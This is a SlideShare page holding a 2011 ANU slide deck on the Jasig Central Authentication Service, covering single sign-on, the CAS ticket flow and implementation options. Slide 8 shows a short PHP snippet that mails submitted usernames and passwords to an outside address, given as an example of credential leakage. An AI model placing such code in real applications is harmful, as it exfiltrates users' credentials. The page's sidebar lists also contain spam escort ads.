SlideShare ist ein Scribd-Unternehmen logo

Jasig

S
Steve Swinsburg

An article I gave to the ANU It community about the Jasig Central Authentication Service - what is is and why we need it.

Technologie
1 von 17
Downloaden Sie, um offline zu lesen
A Central Authentication Service for ANU Steve Swinsburg Java Team Leader Information Technology Infrastructure, ANU March 2011 Thursday, 31 March 2011
Overview • Why do we need single sign on? • Security issues with current approaches to user authentication • The architecture of CAS • How you can implement it • Demo • Future possibilities 2 Thursday, 31 March 2011
Pop quiz • Is same sign on, single sign on, it’s all the same thing right? • We plug our authentication into LDAP, isn’t that enough? NO! 3 Thursday, 31 March 2011
Why do we need single sign on? • User Convenience – User only needs to login once per browser session – Seamless login to multiple participating web applications • Security – Applications never touch a user’s password – User’s have the confidence that their primary credentials won’t be leaked by a compromised web application. 4 Thursday, 31 March 2011
User Convenience • Much simpler experience for users – can have one authoritative credential source • we already do this via LDAP – same sign on – can also be a security issue depending on implementation. – reduce ‘authentication fatigue’ 5 Thursday, 31 March 2011
Security • We already have ‘same sign on’ – Applications use the same authoritative source for user credentials - LDAP: App 1 User App 2 LDAP App 3 6 Thursday, 31 March 2011
The Security Issue • Each web application’s login form touches the user’s password to authenticate the user. • If just one application is compromised, primary credentials are leaked and can be used to access every other system. – Intrusion, wi-fi sniffing, or even just logging. 7 Thursday, 31 March 2011
This may shock you • Credential leaks are not always malicious – could be unintentional, inexperienced developer, unaware • Webapps could be collecting credentials – and mailing them, logging them, writing them to a file... $uid = $_POST['username']; $pwd = $_POST['password']; mail('me@somewhere.com', "credentials", "u=$uid,p=$pwd"); 8 Thursday, 31 March 2011
The Security Solution • Get rid of all application login forms • All applications make use of CAS for authentication • Users no longer present credentials to the individual applications • If an application is compromised, that’s bad, but it will not affect the others as the password cannot be leaked. 9 Thursday, 31 March 2011
The Security Solution • Delegated authentication to CAS CAS App 1 User LDAP App 2 App 3 10 Thursday, 31 March 2011
The Architecture of CAS • To the user, it is a single action – Login and then get redirected back to the app • To the application, it is a series of handshakes to ensure security • Achieved via filters,clients and modules, available for most languages (more on this later) 11 Thursday, 31 March 2011
The Architecture of CAS If need auth, redirect CAS 2 client to CAS App 1 Username 4 CAS redirects to app with ST (GET) Password 1 Form contains Client App verifies ST with a one use Visit app 5 CAS (POST) token (LT) to prevent form CAS responds with replay 6 user auth result and redirects to app Validate Attribute release via 3 credentials SAML (optional) LDAP 12 Thursday, 31 March 2011
The Architecture of CAS • Form contains a one use token (LT) – Cannot be replayed (ie back button) • Client receives a cookie (TGT) to allow future auto login – Tightly scoped (to CAS only) – SSL vended • Application ST is single use only – Cannot be replayed if URL is captured 13 Thursday, 31 March 2011
How you can implement it • Java – casclient, servlet filter • PHP – phpCAS module to get authenticated username – automatically takes care of requests • Closed source or vendor apps – SAML – Custom/modified login module if possible – Consult the vendor (!) 14 Thursday, 31 March 2011
Demo • App 1 – https://jira-test.anu.edu.au • App 2 – https://dev.anu.moodle.netspot.com.au 15 Thursday, 31 March 2011
Future possibilities • Potential to restrict LDAP auth once apps are CASified • Shibboleth is an option for federated access across institutions • Integration between Shib & CAS so the UX is seamless for ANU users • PC login can integrate with CAS via Kerberos 16 Thursday, 31 March 2011
Questions Steve Swinsburg Java Team Leader Information Technology Infrastructure, ANU 17 Thursday, 31 March 2011

Empfohlen

Single sign on - benefits, challenges and case study : iFour consultancy
Single sign on - benefits, challenges and case study : iFour consultancySingle sign on - benefits, challenges and case study : iFour consultancy
Single sign on - benefits, challenges and case study : iFour consultancyDevam Shah
 
Build and Deploy LightSwitch Application on Windows Azure
Build and Deploy LightSwitch Application on Windows AzureBuild and Deploy LightSwitch Application on Windows Azure
Build and Deploy LightSwitch Application on Windows AzureK.Mohamed Faizal
 
Pangolin Datasheet
Pangolin DatasheetPangolin Datasheet
Pangolin Datasheetmattotamhe
 
Cocoaheads
CocoaheadsCocoaheads
CocoaheadsFagner Moura
 
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-on
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-onFast and Free SSO: A Survey of Open-Source Solutions to Single Sign-on
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-onCraig Dickson
 
Authentication and Single Sing on
Authentication and Single Sing onAuthentication and Single Sing on
Authentication and Single Sing onguest648519
 
What's New in CAS 3.5
What's New in CAS 3.5What's New in CAS 3.5
What's New in CAS 3.5Andrew Petro
 
Unicon CAS Update March 2013
Unicon CAS Update March 2013Unicon CAS Update March 2013
Unicon CAS Update March 2013Andrew Petro
 

Empfohlen

Single sign on - benefits, challenges and case study : iFour consultancy
Single sign on - benefits, challenges and case study : iFour consultancySingle sign on - benefits, challenges and case study : iFour consultancy
Single sign on - benefits, challenges and case study : iFour consultancyDevam Shah
 
Build and Deploy LightSwitch Application on Windows Azure
Build and Deploy LightSwitch Application on Windows AzureBuild and Deploy LightSwitch Application on Windows Azure
Build and Deploy LightSwitch Application on Windows AzureK.Mohamed Faizal
 
Pangolin Datasheet
Pangolin DatasheetPangolin Datasheet
Pangolin Datasheetmattotamhe
 
Cocoaheads
CocoaheadsCocoaheads
CocoaheadsFagner Moura
 
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-on
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-onFast and Free SSO: A Survey of Open-Source Solutions to Single Sign-on
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-onCraig Dickson
 
Authentication and Single Sing on
Authentication and Single Sing onAuthentication and Single Sing on
Authentication and Single Sing onguest648519
 
What's New in CAS 3.5
What's New in CAS 3.5What's New in CAS 3.5
What's New in CAS 3.5Andrew Petro
 
Unicon CAS Update March 2013
Unicon CAS Update March 2013Unicon CAS Update March 2013
Unicon CAS Update March 2013Andrew Petro
 
Identity Management Overview: CAS and Shibboleth
Identity Management Overview: CAS and ShibbolethIdentity Management Overview: CAS and Shibboleth
Identity Management Overview: CAS and ShibbolethAndrew Petro
 
Real World Architectures Using Windows Azure Mobile Services
Real World Architectures Using Windows Azure Mobile ServicesReal World Architectures Using Windows Azure Mobile Services
Real World Architectures Using Windows Azure Mobile ServicesKristof Rennen
 
Single Sign-on Framework in Tizen
Single Sign-on Framework in TizenSingle Sign-on Framework in Tizen
Single Sign-on Framework in TizenRyo Jin
 
Scim2012 q1update chrisphillips
Scim2012 q1update chrisphillipsScim2012 q1update chrisphillips
Scim2012 q1update chrisphillipsChris Phillips
 
Identity Federation on JBossAS
Identity Federation on JBossASIdentity Federation on JBossAS
Identity Federation on JBossASRoger CARHUATOCTO
 
Successful Enterprise Single Sign-on: Addressing Deployment Challenges
Successful Enterprise Single Sign-on: Addressing Deployment ChallengesSuccessful Enterprise Single Sign-on: Addressing Deployment Challenges
Successful Enterprise Single Sign-on: Addressing Deployment ChallengesHitachi ID Systems, Inc.
 
Sudeep-Resume
Sudeep-ResumeSudeep-Resume
Sudeep-ResumeSudeep S
 
Hacking Mobile Apps
Hacking Mobile AppsHacking Mobile Apps
Hacking Mobile AppsSophos Benelux
 
A software monitoring framework for quality verification
A software monitoring framework for quality verificationA software monitoring framework for quality verification
A software monitoring framework for quality verificationDileepa Jayathilake
 
OpenSearchLab and the Lucene Ecosystem
OpenSearchLab and the Lucene EcosystemOpenSearchLab and the Lucene Ecosystem
OpenSearchLab and the Lucene EcosystemGrant Ingersoll
 
Online Signature Authentication by Using Mouse Behavior
Online Signature Authentication by Using Mouse Behavior Online Signature Authentication by Using Mouse Behavior
Online Signature Authentication by Using Mouse Behavior Editor IJCATR
 
Cache Security- The Basics
Cache Security- The BasicsCache Security- The Basics
Cache Security- The BasicsInterSystems Corporation
 
Chris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting Refresh
Chris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting RefreshChris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting Refresh
Chris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting RefreshChris Phillips
 
DCEU 18: From Monolith to Microservices
DCEU 18: From Monolith to MicroservicesDCEU 18: From Monolith to Microservices
DCEU 18: From Monolith to MicroservicesDocker, Inc.
 
Webdays blida mobile top 10 risks
Webdays blida mobile top 10 risksWebdays blida mobile top 10 risks
Webdays blida mobile top 10 risksIslam Azeddine Mennouchi
 
JDD2015: Security in the era of modern applications and services - Bolesław D...
JDD2015: Security in the era of modern applications and services - Bolesław D...JDD2015: Security in the era of modern applications and services - Bolesław D...
JDD2015: Security in the era of modern applications and services - Bolesław D...PROIDEA
 
1,2,3 … Testing : Is this thing on(line)? with Mike Martin
1,2,3 … Testing : Is this thing on(line)? with Mike Martin1,2,3 … Testing : Is this thing on(line)? with Mike Martin
1,2,3 … Testing : Is this thing on(line)? with Mike MartinNETUserGroupBern
 
WSO2Con ASIA 2016: Case Study: Identity in the WSO2 Ecosystem
WSO2Con ASIA 2016: Case Study: Identity in the WSO2 EcosystemWSO2Con ASIA 2016: Case Study: Identity in the WSO2 Ecosystem
WSO2Con ASIA 2016: Case Study: Identity in the WSO2 EcosystemWSO2
 
Microservice Architecture
Microservice ArchitectureMicroservice Architecture
Microservice ArchitectureEngin Yoeyen
 
OpenStack Security
OpenStack SecurityOpenStack Security
OpenStack Securityopenstackindia
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 

Weitere ähnliche Inhalte

Ähnlich wie Jasig

Identity Management Overview: CAS and Shibboleth
Identity Management Overview: CAS and ShibbolethIdentity Management Overview: CAS and Shibboleth
Identity Management Overview: CAS and ShibbolethAndrew Petro
 
Real World Architectures Using Windows Azure Mobile Services
Real World Architectures Using Windows Azure Mobile ServicesReal World Architectures Using Windows Azure Mobile Services
Real World Architectures Using Windows Azure Mobile ServicesKristof Rennen
 
Single Sign-on Framework in Tizen
Single Sign-on Framework in TizenSingle Sign-on Framework in Tizen
Single Sign-on Framework in TizenRyo Jin
 
Scim2012 q1update chrisphillips
Scim2012 q1update chrisphillipsScim2012 q1update chrisphillips
Scim2012 q1update chrisphillipsChris Phillips
 
Identity Federation on JBossAS
Identity Federation on JBossASIdentity Federation on JBossAS
Identity Federation on JBossASRoger CARHUATOCTO
 
Successful Enterprise Single Sign-on: Addressing Deployment Challenges
Successful Enterprise Single Sign-on: Addressing Deployment ChallengesSuccessful Enterprise Single Sign-on: Addressing Deployment Challenges
Successful Enterprise Single Sign-on: Addressing Deployment ChallengesHitachi ID Systems, Inc.
 
Sudeep-Resume
Sudeep-ResumeSudeep-Resume
Sudeep-ResumeSudeep S
 
A software monitoring framework for quality verification
A software monitoring framework for quality verificationA software monitoring framework for quality verification
A software monitoring framework for quality verificationDileepa Jayathilake
 
OpenSearchLab and the Lucene Ecosystem
OpenSearchLab and the Lucene EcosystemOpenSearchLab and the Lucene Ecosystem
OpenSearchLab and the Lucene EcosystemGrant Ingersoll
 
Online Signature Authentication by Using Mouse Behavior
Online Signature Authentication by Using Mouse Behavior Online Signature Authentication by Using Mouse Behavior
Online Signature Authentication by Using Mouse Behavior Editor IJCATR
 
Chris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting Refresh
Chris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting RefreshChris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting Refresh
Chris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting RefreshChris Phillips
 
DCEU 18: From Monolith to Microservices
DCEU 18: From Monolith to MicroservicesDCEU 18: From Monolith to Microservices
DCEU 18: From Monolith to MicroservicesDocker, Inc.
 
JDD2015: Security in the era of modern applications and services - Bolesław D...
JDD2015: Security in the era of modern applications and services - Bolesław D...JDD2015: Security in the era of modern applications and services - Bolesław D...
JDD2015: Security in the era of modern applications and services - Bolesław D...PROIDEA
 
1,2,3 … Testing : Is this thing on(line)? with Mike Martin
1,2,3 … Testing : Is this thing on(line)? with Mike Martin1,2,3 … Testing : Is this thing on(line)? with Mike Martin
1,2,3 … Testing : Is this thing on(line)? with Mike MartinNETUserGroupBern
 
WSO2Con ASIA 2016: Case Study: Identity in the WSO2 Ecosystem
WSO2Con ASIA 2016: Case Study: Identity in the WSO2 EcosystemWSO2Con ASIA 2016: Case Study: Identity in the WSO2 Ecosystem
WSO2Con ASIA 2016: Case Study: Identity in the WSO2 EcosystemWSO2
 
Microservice Architecture
Microservice ArchitectureMicroservice Architecture
Microservice ArchitectureEngin Yoeyen
 

Ähnlich wie Jasig (20)

Identity Management Overview: CAS and Shibboleth
Identity Management Overview: CAS and ShibbolethIdentity Management Overview: CAS and Shibboleth
Identity Management Overview: CAS and Shibboleth
 
Real World Architectures Using Windows Azure Mobile Services
Real World Architectures Using Windows Azure Mobile ServicesReal World Architectures Using Windows Azure Mobile Services
Real World Architectures Using Windows Azure Mobile Services
 
Single Sign-on Framework in Tizen
Single Sign-on Framework in TizenSingle Sign-on Framework in Tizen
Single Sign-on Framework in Tizen
 
Scim2012 q1update chrisphillips
Scim2012 q1update chrisphillipsScim2012 q1update chrisphillips
Scim2012 q1update chrisphillips
 
Identity Federation on JBossAS
Identity Federation on JBossASIdentity Federation on JBossAS
Identity Federation on JBossAS
 
Successful Enterprise Single Sign-on: Addressing Deployment Challenges
Successful Enterprise Single Sign-on: Addressing Deployment ChallengesSuccessful Enterprise Single Sign-on: Addressing Deployment Challenges
Successful Enterprise Single Sign-on: Addressing Deployment Challenges
 
Sudeep-Resume
Sudeep-ResumeSudeep-Resume
Sudeep-Resume
 
Hacking Mobile Apps
Hacking Mobile AppsHacking Mobile Apps
Hacking Mobile Apps
 
A software monitoring framework for quality verification
A software monitoring framework for quality verificationA software monitoring framework for quality verification
A software monitoring framework for quality verification
 
OpenSearchLab and the Lucene Ecosystem
OpenSearchLab and the Lucene EcosystemOpenSearchLab and the Lucene Ecosystem
OpenSearchLab and the Lucene Ecosystem
 
Online Signature Authentication by Using Mouse Behavior
Online Signature Authentication by Using Mouse Behavior Online Signature Authentication by Using Mouse Behavior
Online Signature Authentication by Using Mouse Behavior
 
Cache Security- The Basics
Cache Security- The BasicsCache Security- The Basics
Cache Security- The Basics
 
Chris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting Refresh
Chris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting RefreshChris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting Refresh
Chris Phillips SCIM Mace-Dir Internet2 Fall Member Meeting Refresh
 
DCEU 18: From Monolith to Microservices
DCEU 18: From Monolith to MicroservicesDCEU 18: From Monolith to Microservices
DCEU 18: From Monolith to Microservices
 
Webdays blida mobile top 10 risks
Webdays blida mobile top 10 risksWebdays blida mobile top 10 risks
Webdays blida mobile top 10 risks
 
JDD2015: Security in the era of modern applications and services - Bolesław D...
JDD2015: Security in the era of modern applications and services - Bolesław D...JDD2015: Security in the era of modern applications and services - Bolesław D...
JDD2015: Security in the era of modern applications and services - Bolesław D...
 
1,2,3 … Testing : Is this thing on(line)? with Mike Martin
1,2,3 … Testing : Is this thing on(line)? with Mike Martin1,2,3 … Testing : Is this thing on(line)? with Mike Martin
1,2,3 … Testing : Is this thing on(line)? with Mike Martin
 
WSO2Con ASIA 2016: Case Study: Identity in the WSO2 Ecosystem
WSO2Con ASIA 2016: Case Study: Identity in the WSO2 EcosystemWSO2Con ASIA 2016: Case Study: Identity in the WSO2 Ecosystem
WSO2Con ASIA 2016: Case Study: Identity in the WSO2 Ecosystem
 
Microservice Architecture
Microservice ArchitectureMicroservice Architecture
Microservice Architecture
 
OpenStack Security
OpenStack SecurityOpenStack Security
OpenStack Security
 

Kürzlich hochgeladen

Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 

Kürzlich hochgeladen (20)

Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 

Jasig

  • 1. A Central Authentication Service for ANU Steve Swinsburg Java Team Leader Information Technology Infrastructure, ANU March 2011 Thursday, 31 March 2011
  • 2. Overview • Why do we need single sign on? • Security issues with current approaches to user authentication • The architecture of CAS • How you can implement it • Demo • Future possibilities 2 Thursday, 31 March 2011
  • 3. Pop quiz • Is same sign on, single sign on, it’s all the same thing right? • We plug our authentication into LDAP, isn’t that enough? NO! 3 Thursday, 31 March 2011
  • 4. Why do we need single sign on? • User Convenience – User only needs to login once per browser session – Seamless login to multiple participating web applications • Security – Applications never touch a user’s password – User’s have the confidence that their primary credentials won’t be leaked by a compromised web application. 4 Thursday, 31 March 2011
  • 5. User Convenience • Much simpler experience for users – can have one authoritative credential source • we already do this via LDAP – same sign on – can also be a security issue depending on implementation. – reduce ‘authentication fatigue’ 5 Thursday, 31 March 2011
  • 6. Security • We already have ‘same sign on’ – Applications use the same authoritative source for user credentials - LDAP: App 1 User App 2 LDAP App 3 6 Thursday, 31 March 2011
  • 7. The Security Issue • Each web application’s login form touches the user’s password to authenticate the user. • If just one application is compromised, primary credentials are leaked and can be used to access every other system. – Intrusion, wi-fi sniffing, or even just logging. 7 Thursday, 31 March 2011
  • 8. This may shock you • Credential leaks are not always malicious – could be unintentional, inexperienced developer, unaware • Webapps could be collecting credentials – and mailing them, logging them, writing them to a file... $uid = $_POST['username']; $pwd = $_POST['password']; mail('me@somewhere.com', "credentials", "u=$uid,p=$pwd"); 8 Thursday, 31 March 2011
  • 9. The Security Solution • Get rid of all application login forms • All applications make use of CAS for authentication • Users no longer present credentials to the individual applications • If an application is compromised, that’s bad, but it will not affect the others as the password cannot be leaked. 9 Thursday, 31 March 2011
  • 10. The Security Solution • Delegated authentication to CAS CAS App 1 User LDAP App 2 App 3 10 Thursday, 31 March 2011
  • 11. The Architecture of CAS • To the user, it is a single action – Login and then get redirected back to the app • To the application, it is a series of handshakes to ensure security • Achieved via filters,clients and modules, available for most languages (more on this later) 11 Thursday, 31 March 2011
  • 12. The Architecture of CAS If need auth, redirect CAS 2 client to CAS App 1 Username 4 CAS redirects to app with ST (GET) Password 1 Form contains Client App verifies ST with a one use Visit app 5 CAS (POST) token (LT) to prevent form CAS responds with replay 6 user auth result and redirects to app Validate Attribute release via 3 credentials SAML (optional) LDAP 12 Thursday, 31 March 2011
  • 13. The Architecture of CAS • Form contains a one use token (LT) – Cannot be replayed (ie back button) • Client receives a cookie (TGT) to allow future auto login – Tightly scoped (to CAS only) – SSL vended • Application ST is single use only – Cannot be replayed if URL is captured 13 Thursday, 31 March 2011
  • 14. How you can implement it • Java – casclient, servlet filter • PHP – phpCAS module to get authenticated username – automatically takes care of requests • Closed source or vendor apps – SAML – Custom/modified login module if possible – Consult the vendor (!) 14 Thursday, 31 March 2011
  • 15. Demo • App 1 – https://jira-test.anu.edu.au • App 2 – https://dev.anu.moodle.netspot.com.au 15 Thursday, 31 March 2011
  • 16. Future possibilities • Potential to restrict LDAP auth once apps are CASified • Shibboleth is an option for federated access across institutions • Integration between Shib & CAS so the UX is seamless for ANU users • PC login can integrate with CAS via Kerberos 16 Thursday, 31 March 2011
  • 17. Questions Steve Swinsburg Java Team Leader Information Technology Infrastructure, ANU 17 Thursday, 31 March 2011